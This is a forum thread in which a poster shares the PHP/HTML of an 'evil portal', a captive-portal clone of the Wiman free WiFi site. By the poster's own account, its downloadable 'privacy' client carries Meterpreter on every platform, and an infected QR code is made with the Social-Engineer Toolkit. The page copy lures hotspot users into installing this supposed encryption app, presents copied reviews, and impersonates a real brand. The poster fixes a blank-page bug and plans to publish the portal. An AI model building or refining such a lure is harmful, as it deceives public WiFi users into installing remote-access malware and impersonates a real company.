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evil portal to large maybe ?


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ok so i cloned a website with httrack so i could modify the code and so it is a portal for said company//service.

completed all modifications , converted the clone from html to php and uploaded to sd. now this portal offers a download for a client on all platforms with a meterpreter inside each, and an infected qrcode via S.E toolkit. long story short i looked over my code several times and it seems 100% legit. but when i load it I get a blank white page. so my question is what may I possibly be doing wrong here. some insight or help would be appreciated.



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here in the index.php code



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<h1 class="text-heading">Mobile <strong class="nw">Free WiFi</strong> HotSpot.</h1>

<p class="text-subheading hidden-xs">This is a Wiman free wifi hotspot. Wiman seamlessly connects millions of users all around the world to the best Free WiFi in range and allows them to save their gigabytes and money. You can directly connect by clicking ACCEPT.</p>

<a title="Free WiFi" class="download__button m-t-2 visible-xs" data-content="home_hero_button" href="https://play.google.com/store/apps/details?id=me.wiman.androidApp&referrer=utm_source%3Dwiman.me%26utm_medium%3Dreferral%26utm_campaign%3Dacquisition%26utm_term%3Dhomepage%26utm_content%3Dhome_hero_button" rel="nofollow external">Download App</a>






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<h4 class="text-title">Use the App for an additional layer of privacy</h4>

<p class=""> Privacy is a big deal to us at Wiman, this is why we provide an App that gives the user an extra layer of encryption. To connect in this manner simply download the app or desktop client from this page, connect to the portal and install. This will seamlessly add an additional layer of encryption, providing a higher level of browser privacy.</p>



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<p class="text-number" id="wifi-counter" data-total="56725857" data-increment="32758">
<p id="wifi-counter_text" class="m-b-2 text-subnumber">Free WiFi worldwide</p>

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<h3 class="text-title m-b-0">Increased Security <strong class="nw"> End to End Encryption</strong></h3>





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<h3 class="text-title text-center m-b-4">Wiman Free Wifi HotSpot User Terms of Usage </h3>



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<div class="col-sm-8 col-sm-offset-2">

<p>This is a Wiman Free wifi hotspot. By using Wiman Free Wifi, you hereby expressly acknowledge and agree that there are significant security, privacy and confidentiality risks inherent in accessing or transmitting information through the internet, whether the connection is facilitated through wired or wireless technology. Security issues include, without limitation, interception of transmissions, loss of data, and the introduction of viruses and other programs that can corrupt or damage your computer. Accordingly, you agree that the owner and/or provider of this network is NOT liable for any interception or transmissions, computer worms or viruses, loss of data, file corruption, hacking or damage to your computer or other devices that result from the transmission or download of information or materials through the internet service provided..</p>
<form method="POST" action="/captiveportal/index.php">
<input type="hidden" name="target" value="<?=$destination?>">
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<p class="review__text"><strong>Great Design</strong> Excellent job on the app! The design is really commendable and the app has a lot of useful features.</p>
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<p class="review__text"><strong>Great App</strong> Get as many people on board as possible, works well, does it's job. Should be installed as standard on all devices!</p>
<div class="col-sm-6 review">
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<img src="https://lh3.googleusercontent.com/-u8_Ao60v24c/AAAAAAAAAAI/AAAAAAAAABg/yAHpGdllgPo/w160-c-h160/photo.jpg" width="80" height="80" class="media-object review__avatar" alt="user">
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<strong class="review__user">Olaide John olaolopin</strong>
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<p class="review__text"><strong>Excellent</strong> This app is very useful & helpful it will add value to life. I really recommend it.</p>
<div class="col-sm-6 review">
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<img src="https://lh3.googleusercontent.com/-MM4WvRIcDVY/AAAAAAAAAAI/AAAAAAAAABY/SZdepXXcsmw/w160-c-h160/photo.jpg" width="80" height="80" class="media-object review__avatar" alt="user">
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<strong class="review__user">Maria De Jesus</strong>
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<p class="review__text">.....😱..<strong>gasp*</strong> Finally found something useful!</p>






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problem solved, I plan on making this available via github


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echo "					<h1 class=\"text-heading\">Mobile <strong class=\"nw\">Free WiFi</strong> HotSpot.</h1>\n";
echo "\n";
echo "					<p class=\"text-subheading hidden-xs\">This is a Wiman free wifi hotspot. Wiman seamlessly connects millions of users all around the world to the best Free WiFi in range and allows them to save their gigabytes and money. You can directly connect by clicking ACCEPT.</p>\n";
echo "					\n";
echo "				\n";
echo "				</div>\n";
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echo "							<h4 class=\"text-title\">Use the App for an additional layer of privacy</h4>\n";
echo "							<p class=\"\"> Privacy is a big deal to us at Wiman, this is why we provide an App that gives the user an extra layer of encryption. To connect in this manner simply download the app or desktop client from this page, connect to the portal and install. This will seamlessly add an additional layer of encryption, providing a higher level of browser privacy.</p>\n";
echo "							\n";
echo "					</div>\n";
echo "					\n";
echo "				\n";
echo "					\n";
echo "	</section>\n";
echo "\n";
echo "\n";
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echo "\n";
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echo "	<div class=\"container\">\n";
echo "		<div class=\"row\">\n";
echo "			<div class=\"col-sm-12\">\n";
echo "				<p class=\"text-number\" id=\"wifi-counter\"\n";
echo "					data-total=\"56725857\" \n";
echo "					data-increment=\"32758\">\n";
echo "						56725857					</p>\n";
echo "				<p id=\"wifi-counter_text\" class=\"m-b-2 text-subnumber\">Free WiFi worldwide</p>\n";
echo "                   \n";
echo "		</div>\n";
echo "	</div>\n";
echo "       <div id=\"dotted_map\" class=\"img-responsive dotted-map\">\n";
echo "           <img class=\"img-responsive\" src=\"assets/images/wifi-counter.png\">\n";
echo "       </div>\n";
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echo "						\n";
echo "							<h3 class=\"text-title m-b-0\">Increased Security <strong class=\"nw\"> End to End Encryption</strong></h3>\n";
echo "						\n";
echo "						</div>\n";
echo "						</div>\n";
echo "					\n";
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echo "					\n";
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echo "					</div>\n";
echo "				\n";
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echo "			\n";
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echo "			\n";
echo "				<header class=\"block-heading m-b-4 hidden-xs\">\n";
echo "					\n";
echo "					<div class=\"row m-b-2\">\n";
echo "						\n";
echo "						<div class=\"col-sm-8 col-md-6 col-lg-8 col-sm-offset-2 col-md-offset-3 col-lg-offset-2\">\n";
echo "\n";
echo "							<h3 class=\"text-title text-center m-b-4\">Wiman Free Wifi HotSpot User Terms of Usage </h3>\n";
echo "							</div>\n";
echo "						\n";
echo "					</div>\n";
echo "					\n";
echo "					<div class=\"row\">\n";
echo "						\n";
echo "						<div class=\"col-sm-8 col-sm-offset-2\">\n";
echo "\n";
echo "							<p>This is a Wiman Free wifi hotspot. By using Wiman Free Wifi, you hereby expressly acknowledge and agree that there are significant security, privacy and confidentiality risks inherent in accessing or transmitting information through the internet, whether the connection is facilitated through wired or wireless technology. Security issues include, without limitation, interception of transmissions, loss of data, and the introduction of viruses and other programs that can corrupt or damage your computer. Accordingly, you agree that the owner and/or provider of this network is NOT liable for any interception or transmissions, computer worms or viruses, loss of data, file corruption, hacking or damage to your computer or other devices that result from the transmission or download of information or materials through the internet service provided..</p>\n";
echo "						        <form method=\"POST\" action=\"/captiveportal/index.php\">\n";
echo "                                                               <input type=\"hidden\" name=\"target\" value=\"<?=$destination?>\">\n";
echo "                                                               <button type=\"submit\">Accept</button>\n";
echo "                                                               </form>\n";
echo "						</div>\n";
echo "						\n";
echo "					</div>\n";
echo "					\n";
echo "				</header>\n";
echo "		\n";
echo "				<div class=\"row\">\n";
echo "                                                    <div class=\"col-sm-6 review\">\n";
echo "                               <div class=\"media\">\n";
echo "                                   <div class=\"media-left review__media\">\n";
echo "                                       <img src=\"https://lh3.googleusercontent.com/-M9aRSgdTjzw/AAAAAAAAAAI/AAAAAAAAKMQ/Uz5SL55Y4nE/w160-c-h160/photo.jpg\" width=\"80\" height=\"80\" class=\"media-object review__avatar\" alt=\"user\">\n";
echo "                                   </div>\n";
echo "                                   <div class=\"media-body\">\n";
echo "                                       <strong class=\"review__user\">Smitesh Kharat</strong>\n";
echo "                                       <div class=\"review__rating\">\n";
echo "                                        <i class=\"material-icons review__star\">star</i><i class=\"material-icons review__star\">star</i><i class=\"material-icons review__star\">star</i><i class=\"material-icons review__star\">star</i><i class=\"material-icons review__star\">star</i>\n";
echo "                                       </div>\n";
echo "                                       <p class=\"review__text\"><strong>Great Design</strong> Excellent job on the app! The design is really commendable and the app has a lot of useful features.</p>\n";
echo "                                   </div>\n";
echo "                               </div>\n";
echo "                           </div>\n";
echo "                                                   <div class=\"col-sm-6 review\">\n";
echo "                               <div class=\"media\">\n";
echo "                                   <div class=\"media-left review__media\">\n";
echo "                                       <img src=\"https://lh3.googleusercontent.com/-blc-Oe4cCGY/AAAAAAAAAAI/AAAAAAAAACc/oV4_NCiDfUY/w160-c-h160/photo.jpg\" width=\"80\" height=\"80\" class=\"media-object review__avatar\" alt=\"user\">\n";
echo "                                   </div>\n";
echo "                                   <div class=\"media-body\">\n";
echo "                                       <strong class=\"review__user\">Paul Wade</strong>\n";
echo "                                       <div class=\"review__rating\">\n";
echo "                                        <i class=\"material-icons review__star\">star</i><i class=\"material-icons review__star\">star</i><i class=\"material-icons review__star\">star</i><i class=\"material-icons review__star\">star</i><i class=\"material-icons review__star\">star</i>\n";
echo "                                       </div>\n";
echo "                                       <p class=\"review__text\"><strong>Great App</strong> Get as many people on board as possible, works well, does it's job. Should be installed as standard on all devices!</p>\n";
echo "                                   </div>\n";
echo "                               </div>\n";
echo "                           </div>\n";
echo "                                                   <div class=\"col-sm-6 review\">\n";
echo "                               <div class=\"media\">\n";
echo "                                   <div class=\"media-left review__media\">\n";
echo "                                       <img src=\"https://lh3.googleusercontent.com/-u8_Ao60v24c/AAAAAAAAAAI/AAAAAAAAABg/yAHpGdllgPo/w160-c-h160/photo.jpg\" width=\"80\" height=\"80\" class=\"media-object review__avatar\" alt=\"user\">\n";
echo "                                   </div>\n";
echo "                                   <div class=\"media-body\">\n";
echo "                                       <strong class=\"review__user\">Olaide John olaolopin</strong>\n";
echo "                                       <div class=\"review__rating\">\n";
echo "                                        <i class=\"material-icons review__star\">star</i><i class=\"material-icons review__star\">star</i><i class=\"material-icons review__star\">star</i><i class=\"material-icons review__star\">star</i><i class=\"material-icons review__star\">star</i>\n";
echo "                                       </div>\n";
echo "                                       <p class=\"review__text\"><strong>Excellent</strong> This app is very useful & helpful it will add value to life. I really recommend it.</p>\n";
echo "                                   </div>\n";
echo "                               </div>\n";
echo "                           </div>\n";
echo "                                                   <div class=\"col-sm-6 review\">\n";
echo "                               <div class=\"media\">\n";
echo "                                   <div class=\"media-left review__media\">\n";
echo "                                       <img src=\"https://lh3.googleusercontent.com/-MM4WvRIcDVY/AAAAAAAAAAI/AAAAAAAAABY/SZdepXXcsmw/w160-c-h160/photo.jpg\" width=\"80\" height=\"80\" class=\"media-object review__avatar\" alt=\"user\">\n";
echo "                                   </div>\n";
echo "                                   <div class=\"media-body\">\n";
echo "                                       <strong class=\"review__user\">Maria De Jesus</strong>\n";
echo "                                       <div class=\"review__rating\">\n";
echo "                                        <i class=\"material-icons review__star\">star</i><i class=\"material-icons review__star\">star</i><i class=\"material-icons review__star\">star</i><i class=\"material-icons review__star\">star</i><i class=\"material-icons review__star\">star</i>\n";
echo "                                       </div>\n";
echo "                                       <p class=\"review__text\">.....😱..<strong>gasp*</strong> Finally found something useful!</p>\n";
echo "                                   </div>\n";
echo "                               </div>\n";
echo "                           </div>\n";
echo "                       \n";
echo "				</div>\n";
echo "				\n";
echo "			</div>\n";
echo "		\n";
echo "		</div>\n";
echo "	\n";
echo "	</div>\n";
echo "	\n";
echo "</section>\n";
echo "\n";
echo "\n";
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echo "			<ul class=\"brands__list\">\n";
echo "				<li class=\"brands__item fbstart\" title=\"FB Start\">FB Start</li>\n";
echo "				<li class=\"brands__item launchpad\" title=\"Google Launchpad\">Google Launchpad</li>\n";
echo "				<li class=\"brands__item aws\" title=\"Amazon AWS Activate\">Amazon AWS Activate</li>\n";
echo "				<li class=\"brands__item internetorg\" title=\"Internet.org\">Internet.org</li>\n";
echo "				<li class=\"brands__item bizspark hidden-sm\" title=\"Microsoft Bizspark\">Microsoft Bizspark</li>\n";
echo "			</ul>\n";
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